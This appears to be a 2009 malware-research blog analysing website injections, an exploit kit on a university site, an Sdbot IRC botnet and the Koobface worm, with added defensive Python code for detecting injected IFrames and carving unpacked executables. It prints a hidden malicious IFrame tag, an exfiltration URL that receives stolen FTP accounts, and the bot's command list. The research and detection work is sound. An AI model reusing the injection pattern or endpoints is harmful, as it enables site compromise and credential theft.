6/15/2009 4:15:00 PM

Turkish governmental websites under attack

by Bahaa Naamneh

Several Turkish governmental websites have come under web attack. The following websites have been compromised, and obfuscated JavaScript and IFrame tags have been injected into them:

http://[hidden]isar.meb.gov.tr
http://[hidden]ele.meb.gov.tr
http://[hidden]kale.meb.gov.tr
http://[hidden]lu-gsim.gov.tr
http://[hidden]zigrsh.gov.tr

Each of the IFrame tags leads to a different malicious domain, which ends up downloading a variety of Trojans, including infostealers and botnet Trojans.

One of the IFrames leads to a rather interesting malicious script with a 0 detection rate on VirusTotal (we have already added a signature for this script; it will be available in the next update).

That obfuscated script makes heavy use of HTML tags in its obfuscation routine: the data needed by the JavaScript de-obfuscation routine is stored inside HTML tags rather than in the script itself.

The script then downloads a Trojan downloader which, once run, downloads a second Trojan that steals FTP accounts. The latter searches the file system and the registry for the saved accounts of multiple FTP clients and sends them to a Chinese domain:
http://f97q.cn/r4/t1.php



Tags: Malweb

6/10/2009 2:05:00 PM

Hackers used a university website to host their exploit kit

by Bahaa Naamneh

The website of the embassy of Belize in Taiwan has been compromised and an obfuscated JavaScript has been injected into it.

After decoding, the script reveals itself as an IFrame pointing to one of the pages on the Kaohsiung Medical University website:

<iframe src="http://[HIDDEN].club.kmu.edu.tw/ice/index.php" width="0" height="0"></iframe>

We are all too familiar with the usual scenario where hackers compromise a legitimate website so that its visitors get redirected to the hackers' own servers, where the exploit kit is hosted. The ironic thing this time is that the hackers did not redirect victims to servers of their own, but to a university website which they had compromised and installed their exploit kit on (probably IcePack), and which they used as the landing point for other compromised websites as well.

At the time of writing, however, the exploit kit has been removed from the university website.
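As an added example (not code from the original posts), a small scanner for the injection patterns described in this post and in the Turkish-websites post above: zero-size IFrames, IFrames pointing off the page's own host, and inline scripts built around decoding calls or one very long string literal. The host names in the sample are constructed; nothing here decodes the scripts, it only flags them for analysis.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Calls that dominate the decoding stubs of injected scripts
DECODE_CALLS = ("unescape(", "fromcharcode(", "eval(", "document.write(")

class InjectionScanner(HTMLParser):
    # Collects zero-size IFrames, off-host IFrames and decoding-stub scripts.
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host  # host the page legitimately lives on
        self.findings = []          # (kind, detail, reason) tuples
        self._script = None         # text buffer while inside <script>
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}
        if tag == "iframe":
            hidden = a.get("width") in ("0", "0px") or a.get("height") in ("0", "0px")
            host = urlparse(a.get("src", "")).hostname or ""
            if hidden or (host and host != self.page_host):
                self.findings.append(("iframe", a.get("src", ""),
                                      "hidden" if hidden else "external"))
        elif tag == "script":
            self._script = []
    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body, self._script = "".join(self._script).lower(), None
            hits = sum(body.count(c) for c in DECODE_CALLS)
            # one huge string literal is the usual encoded payload
            blob = re.search(r"['\"][^'\"]{200,}['\"]", body) is not None
            if hits >= 2 or blob:
                self.findings.append(("script", f"{hits} decode calls",
                                      "long literal" if blob else ""))

def scan_html(html, page_host):
    scanner = InjectionScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample: an injected hidden IFrame, a decoding stub, and one
# legitimate same-host IFrame that must not be flagged.
SAMPLE_HTML = """<html><body><p>Embassy news</p>
<iframe src="http://kit.example.invalid/ice/index.php" width="0" height="0"></iframe>
<script>var s=unescape('%3C%69%66');document.write(s);</script>
<iframe src="http://www.example.org/map"></iframe>
</body></html>"""
```

Run `scan_html(SAMPLE_HTML, "www.example.org")` to get the two findings; the same-host, full-size IFrame produces none.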


5/17/2009 4:54:00 PM

Analysis of botnet attack targeting Instant Messaging users

by Bahaa Naamneh

In this blog post I'll examine a botnet attack that uses Instant Messaging services such as AIM and Live Messenger to recruit infected computers. This botnet spreads a malicious Sdbot variant with a low detection rate; the following is a detailed technical analysis of this bot.

The Attack Vector
The Trojan itself arrives through MSN Messenger as a message containing a link, sent out by contacts whose systems are infected. Here is an example of such a message:

Once the user clicks the link, an executable is downloaded to the user's system. The executable does not launch on its own, however: the user must run it manually.

The downloaded executable is a Win32 Cabinet Self-Extractor given a name that makes it look like an image file: IMG000985215488524-JPEG.EXE.

This Trojan has a very low detection rate on VirusTotal. At the time of writing, only 7 out of 40 AV products detect this bot:

Antivirus          Version      Last update  Result
a-squared          4.0.0.101    2009.05.13   Win32.SuspectCrc!IK
AntiVir            7.9.0.166    2009.05.13   SPR/Tool.Injector.101376B
eSafe              7.0.17.0     2009.05.13   Win32.Trojan
Ikarus             T3.1.1.49.0  2009.05.13   Win32.SuspectCrc
McAfee-GW-Edition  6.7.6        2009.05.13   Riskware.Tool.Injector.101376B
Microsoft          1.4602       2009.05.13   VirTool:Win32/Injector.gen!B
Prevx              3.0          2009.05.13   Medium Risk Malware

The Cabinet Self-Extractor drops a file named d.exe, which carries another packed PE file in its resource section (packed with some private packer).

The decoding routine

[Figure: The decoding routine of the bot (part 1).]
[Figure: The decoding routine of the bot (part 2).]
[Figure: The decoding routine of the bot (part 3).]
Now, to get the new executable, we simply dump the memory to a file and, using a hex editor, cut the junk data from the beginning of the dump file.

Then, using a tool such as Stud_PE, we cut off the extra data at the end of the dump file.
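The two trimming steps above, done programmatically: an added example (not the author's tooling, and not a description of what Stud_PE does internally) that locates the real DOS/PE header in a dump, ignores stray "MZ" pairs in the junk, and takes the end of the last section's raw data as the cut point. It assumes, as the manual trim in the post does, that the decoded buffer holds the executable in its on-disk layout; the sample PE and dump are constructed.

```python
import struct

def find_pe_header(dump: bytes) -> int:
    # Offset of the first "MZ" whose e_lfanew really points at "PE\0\0";
    # a bare "MZ" in the junk is skipped. Returns -1 if nothing qualifies.
    pos = dump.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(dump):
            e_lfanew = struct.unpack_from("<I", dump, pos + 0x3C)[0]
            sig = pos + e_lfanew
            if dump[sig:sig + 4] == b"PE\0\0":
                return pos
        pos = dump.find(b"MZ", pos + 1)
    return -1

def pe_file_size(dump: bytes, base: int) -> int:
    # On-disk size relative to base: the end of the section table or the
    # farthest PointerToRawData + SizeOfRawData, whichever is larger.
    e_lfanew = struct.unpack_from("<I", dump, base + 0x3C)[0]
    pe = base + e_lfanew
    num_sections = struct.unpack_from("<H", dump, pe + 6)[0]
    opt_size = struct.unpack_from("<H", dump, pe + 20)[0]
    sect = pe + 24 + opt_size
    end = e_lfanew + 24 + opt_size + num_sections * 40
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", dump, sect + i * 40 + 16)
        end = max(end, raw_ptr + raw_size)
    return end

def carve_pe(dump: bytes) -> bytes:
    # Drop leading junk (before the DOS header) and trailing junk (after the
    # last section's raw data), leaving the executable as it would be on disk.
    base = find_pe_header(dump)
    if base < 0:
        raise ValueError("no valid PE header in dump")
    return dump[base:base + pe_file_size(dump, base)]

def build_sample_pe() -> bytes:
    # Constructed minimal PE: DOS header, COFF header with no optional header,
    # one section of 0x20 bytes at raw offset 0x80 (160 bytes in total).
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x0102)
    section = b".text\0\0\0" + struct.pack("<IIIIIIHHI", 0x20, 0x1000, 0x20,
                                             0x80, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + coff + section + b"\xCC" * 0x20

# Constructed dump: a decoy "MZ" plus NOP junk in front, junk after the section.
SAMPLE_DUMP = b"MZ" + b"\x90" * 35 + build_sample_pe() + b"\x00trailing junk" * 3
```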

Now we have the real Trojan. At a glance, we can clearly see it is an IRC bot, more precisely an SdBot, which connects to an IRC server and joins a channel, waiting for further commands from its operators.

The detection rate on VirusTotal is better now, with 21 out of 40 products detecting this bot:

Antivirus          Version      Last update  Result
a-squared          4.0.0.101    2009.05.13   Virus.Win32.IRCBot.BSX!IK
AntiVir            7.9.0.166    2009.05.13   TR/Spy.Gen
Authentium         5.1.2.4      2009.05.13   W32/Bloop.A.gen!Eldorado
Avast              4.8.1335.0   2009.05.12   Win32:IRCBot-BSX
BitDefender        7.2          2009.05.13   Backdoor.Agent.AAAT
DrWeb              5.0.0.12182  2009.05.13   DLOADER.IRC.Trojan
eSafe              7.0.17.0     2009.05.13   Win32.Trojan
F-Prot             4.4.4.56     2009.05.13   W32/Bloop.A.gen!Eldorado
F-Secure           8.0.14470.0  2009.05.13   Backdoor.Win32.SdBot.eit
GData              19           2009.05.13   Backdoor.Agent.AAAT
Ikarus             T3.1.1.49.0  2009.05.13   Virus.Win32.IRCBot.BSX
Kaspersky          7.0.0.125    2009.05.13   Backdoor.Win32.SdBot.eit
McAfee             5613         2009.05.12   W32/Sdbot.worm.gen.a
McAfee+Artemis     5613         2009.05.12   W32/Sdbot.worm.gen.a
McAfee-GW-Edition  6.7.6        2009.05.13   Trojan.Spy.Gen
Microsoft          1.4602       2009.05.13   Worm:Win32/Pushbot.gen
NOD32              4070         2009.05.13   probably a variant of IRC/SdBot
Norman             6.01.05      2009.05.13   W32/Malware
Rising             21.29.24.00  2009.05.13   Worm.Win32.Pushbot.ad
Symantec           1.4.4.12     2009.05.13   W32.Spybot.Worm
VBA32              3.12.10.5    2009.05.13   suspected of Backdoor.xBot.1 (paranoid heuristics)

The following are the commands accepted by this botnet:
login || l
logout || lo
rm
download
update
gone || rmzerm3b1tch
threads || t
r.getfile
r.new
r.update || r.upd4te
msn.msg
msn.stop
aim.msg
aim.stop
trion.msg
trion.stop

Inspecting the strings of the unpacked executable, we can see that the bot's functionality includes:
- Download and execute remote files
- Registry manipulation
- Services manipulation
- Opening sockets, including sending and receiving data through sockets
- Sending/Downloading data through HTTP
- Uploading/Downloading files through FTP
- DNS manipulation
- Opening ports on the infected system and hiding those ports
- Retrieve TCP, UDP listener tables
- Retrieve MIB-II interface table
- Retrieve IP-to-physical address mapping table
- Add/Remove Network Connections
- Keylogging
- ARP table manipulation
- ODBC functionalities

Tags: Malweb

1/31/2009 6:41:00 PM

Google labels the whole web with "This Site May Harm Your Computer"

by Bahaa Naamneh

For almost half an hour, every result of every web search performed via Google was tagged by Google with "This site may harm your computer".

Google's StopBadware service was broken, but the problem seems to have been fixed by now.

Here are a couple of screenshots showing Google reporting itself as a harmful website:


Update (2/1/09): Google explains what happened: the bug was simply human error.



11/23/2008 10:47:00 PM

Facebook Worm Needs Your Help to Read CAPTCHAs!

by Bahaa Naamneh

After using Geocities as its main redirection point, the Koobface worm is now taking advantage of Google's Blogger to redirect Facebook users to malware websites.

In this latest attack, the worm sends Facebook users messages urging them to watch a video that appears to be hosted on Blogger. Victims end up infecting their systems with the latest Koobface worm from a fake YouTube website. To create Blogger accounts at random for the redirections to the malicious domains, this Koobface variant requires a little help from you: reading CAPTCHAs.

This attack uses tempting messages such as "You look so fine in this video"; here is what the messages may look like:

If the user complies with this message and clicks the proposed blogspot.com link, he is redirected to a fake YouTube website. The fake YouTube page requires the user to install an alleged "Adobe Flash Player Installer" (Flash_Update.exe) in order to watch the video. Executing Flash_Update.exe infects the system with the Koobface worm.

The following details explain how this attack works:
Flash_Update.exe downloads a couple of executables, google_reg.exe and captcha.exe, onto the affected system from aibcvienna.org, which appears to be a legitimate website compromised by the hackers. Note that the same domain also hosts other executables tailored for hi5 and MySpace users.

The file google_reg.exe attempts to create new Google accounts, for which it needs human help in reading the CAPTCHA. It uploads the CAPTCHA image to a server and waits for captcha.exe to download it. captcha.exe drops a file named captcha5.dll into the Program Files directory and runs it using rundll32.exe, a system utility for executing .dll files. The dropped DLL displays a shutdown window that freezes the system and demands that the user enter the characters shown in an image before a 3-minute countdown timer ends. The image is in fact the CAPTCHA that google_reg.exe is waiting for the victim to decipher.


Once entered, the characters are sent back to the server, where google_reg.exe is waiting for them to finish creating the blogspot.com account, for later use in attacking other Facebook users.

Tags: Hackers, Web-based Trojans